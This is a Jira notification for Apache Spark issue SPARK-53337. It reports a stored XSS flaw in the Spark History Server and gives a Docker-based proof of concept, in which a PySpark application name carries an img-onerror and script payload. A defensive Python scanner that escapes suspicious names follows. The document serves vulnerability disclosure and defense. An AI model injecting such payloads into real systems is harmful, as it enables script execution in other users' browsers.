Alexandre Pujol created SPARK-53337:
---------------------------------------

             Summary: XSS Vulnerability Fix in Spark Web
                 Key: SPARK-53337
                 URL: https://issues.apache.org/jira/browse/SPARK-53337
             Project: Spark
          Issue Type: Bug
          Components: Spark Core
    Affects Versions: 4.0.0, 3.5.6
            Reporter: Alexandre Pujol


We found an XSS injection in Spark Web 3.5.4. It is triggered on the 
application name in the job viewing interface. 

You will find below the full POC to re-create it using a simple docker 
container. Let us know if you need more details regarding this issue. 

Acknowledgment: This vulnerability has been found by Yann Gourio (cc'ed) 

### POC 

Start Spark 3.5.4 in a container 
```sh 
mkdir spark-logs 
chmod 777 spark-logs 
docker run -it --rm -v "${PWD}/spark-logs:/spark-logs" \
    spark:3.5.4-scala2.12-java17-python3-ubuntu /bin/bash 
``` 

Inside the container, generate the PySpark script with the payload in the 
application name. 
```sh 
cat <<EOF > script.py 

from pyspark.sql import SparkSession 

if __name__ == "__main__": 
   spark = SparkSession \ 
       .builder \ 
       .appName("<img src=x onerror=alert(/jedi master/)><script>alert(/Dark Vador/)</script>") \ 
       .getOrCreate() 

   print(spark.range(1000 * 1000 * 1000).count()) 

   spark.stop() 

EOF 
``` 

Still inside the container, start the application: 
```sh 
/opt/spark/bin/spark-submit --conf "spark.eventLog.enabled=true" \
    --conf "spark.eventLog.dir=/spark-logs" script.py 
``` 

Now start the Spark History Server. 
```sh 
docker run -it --rm -p 18080:18080 -v "${PWD}/spark-logs:/spark-logs" \
    -e "SPARK_HISTORY_OPTS='-Dspark.history.fs.logDirectory=/spark-logs'" \
    -e "SPARK_NO_DAEMONIZE=TRUE" spark:3.5.4-scala2.12-java17-python3-ubuntu \
    /opt/spark/sbin/start-history-server.sh 
``` 

On the host machine, open a browser and go to http://localhost:18080/. You 
should see a JavaScript alert pop-up. 
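The History Server renders the application name from the event log into its pages, which is why a name carrying markup fires in the browser. As an added example (not part of the report or of the Spark code base), the script below scans a Spark event log for `SparkListenerApplicationStart` events whose `App Name` contains HTML metacharacters, and shows the escaped form a UI should render instead; the event log lines are constructed for the example.

```python
import html
import json

# Constructed sample of a Spark event log (one JSON object per line), the
# format the History Server reads from spark.eventLog.dir. Only the fields
# needed here are included; the second ApplicationStart entry carries an
# HTML payload in its application name, mirroring the POC above.
SAMPLE_EVENT_LOG = "\n".join([
    json.dumps({"Event": "SparkListenerLogStart", "Spark Version": "3.5.4"}),
    json.dumps({"Event": "SparkListenerApplicationStart",
                "App Name": "daily-etl", "App ID": "app-20250101000000-0001",
                "Timestamp": 1735689600000, "User": "etl"}),
    json.dumps({"Event": "SparkListenerApplicationStart",
                "App Name": "<img src=x onerror=alert(1)>",
                "App ID": "app-20250101000000-0002",
                "Timestamp": 1735689660000, "User": "unknown"}),
    json.dumps({"Event": "SparkListenerApplicationEnd",
                "Timestamp": 1735689700000}),
])

# Characters that must never reach an HTML page unescaped.
HTML_SPECIALS = set('<>"\'&')


def suspicious_app_names(event_log_text):
    """Return (app_id, app_name, user) for every ApplicationStart event whose
    name contains HTML metacharacters. Lines that are not JSON are skipped."""
    findings = []
    for line in event_log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if event.get("Event") != "SparkListenerApplicationStart":
            continue
        name = event.get("App Name", "")
        if HTML_SPECIALS & set(name):
            findings.append((event.get("App ID"), name, event.get("User")))
    return findings


def render_app_name(app_name):
    """What a UI must do with an untrusted name before emitting it as HTML:
    escape it, so the payload becomes inert text instead of markup."""
    return html.escape(app_name, quote=True)


if __name__ == "__main__":
    for app_id, name, user in suspicious_app_names(SAMPLE_EVENT_LOG):
        print(f"{app_id} submitted by {user!r}: {render_app_name(name)}")
```

Pointing the scanner at the files under `spark.eventLog.dir` gives a quick inventory of already-logged applications whose names would be rendered as markup by an unpatched History Server.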



--
This message was sent by Atlassian Jira
(v8.20.10#820010)